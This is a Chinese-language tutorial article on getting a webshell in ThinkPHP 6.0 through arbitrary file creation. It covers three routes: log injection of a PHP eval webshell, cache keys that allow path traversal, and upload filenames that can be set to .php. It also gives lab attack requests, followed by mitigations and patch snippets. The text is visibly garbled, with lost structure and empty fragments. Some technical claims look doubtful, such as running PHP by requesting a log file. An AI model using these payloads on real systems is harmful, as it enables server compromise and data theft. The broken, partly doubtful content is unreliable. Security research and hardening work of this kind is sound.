# ThinkPHP6.0中怎么利用Getshell創建任意文件
## 前言
ThinkPHP作為國內廣泛使用的PHP開發框架,其安全性一直備受關注。本文將深入分析ThinkPHP6.0中可能導致Getshell的安全漏洞,并詳細講解攻擊者如何利用這些漏洞創建任意文件。文章僅供安全研究使用,請勿用于非法用途。
## 一、漏洞背景
### 1.1 ThinkPHP6.0簡介
ThinkPHP6.0是ThinkPHP框架的一個重要版本,采用全新的架構設計,具有以下特點:
- 支持PSR規范
- 改進的依賴注入
- 更靈活的中間件機制
- 性能優化提升
### 1.2 Getshell的危害
Getshell攻擊可使攻擊者:
- 在服務器上執行任意代碼
- 竊取敏感數據
- 建立持久化后門
- 進行橫向滲透
## 二、漏洞原理分析
### 2.1 文件操作相關危險函數
ThinkPHP6.0中可能存在風險的函數包括:
```php
file_put_contents()
fopen()/fwrite()
move_uploaded_file()
copy()
rename()
日志寫入漏洞
Log::write()方法未嚴格過濾內容
緩存文件寫入
緩存key未過濾導致路徑穿越
模板編譯漏洞
動態模板文件名控制不嚴
文件上傳漏洞
未正確驗證上傳文件類型和內容
典型利用代碼:
// 惡意構造的請求參數
$_GET['content'] = '<?php eval($_POST[cmd]);?>';
// 觸發日志記錄
\think\facade\Log::write($_GET['content'], 'notice');
利用步驟: 1. 找到可控制日志內容的入口點 2. 寫入PHP代碼到日志文件 3. 通過web訪問日志文件觸發代碼執行
危險配置示例:
// 緩存key未過濾
$key = $_GET['key'];
$data = '惡意內容';
Cache::set($key, $data);
利用方法:
1. 構造包含路徑穿越的key:../../public/shell.php
2. 使緩存內容包含PHP代碼
3. 直接訪問生成的文件
典型漏洞代碼:
$file = request()->file('file');
$file->move('../runtime', $_GET['name']);
攻擊過程: 1. 上傳包含惡意代碼的圖片文件 2. 通過文件名控制保存為.php后綴 3. 訪問上傳的文件執行代碼
嚴格過濾用戶輸入
// 正確的文件名過濾
$filename = preg_replace('/[^a-zA-Z0-9_\-\.]/', '', $_GET['filename']);
禁用危險函數 在php.ini中設置:
disable_functions = exec,passthru,shell_exec,system
文件操作權限控制
// 限制文件保存目錄
$savePath = app()->getRuntimePath().'cache/';
關閉調試模式:
APP_DEBUG = false
設置安全過濾規則:
// config/app.php
'default_filter' => 'htmlspecialchars,strip_tags',
限制日志目錄訪問:
location ~ ^/runtime/ {
deny all;
}
代碼審計重點檢查:
自動化工具掃描:
phpcs --standard=Security --extensions=php ./app
以TP6.0.7安全更新為例: 1. 加強Log類過濾:
+ $message = htmlspecialchars($message);
if (strpos($key, '..') !== false) {
throw new InvalidArgumentException('Invalid cache key');
}
使用Docker快速搭建測試環境:
docker run -d -p 8080:80 --name tp6 vulhub/thinkphp:6.0.0
發送惡意請求:
GET /index.php?content=<?php phpinfo();?> HTTP/1.1
查看生成的日志文件:
/runtime/log/202208/15.log
訪問日志文件執行代碼:
GET /runtime/log/202208/15.log HTTP/1.1
修復后嘗試攻擊:
GET /index.php?content=<script>alert(1)</script> HTTP/1.1
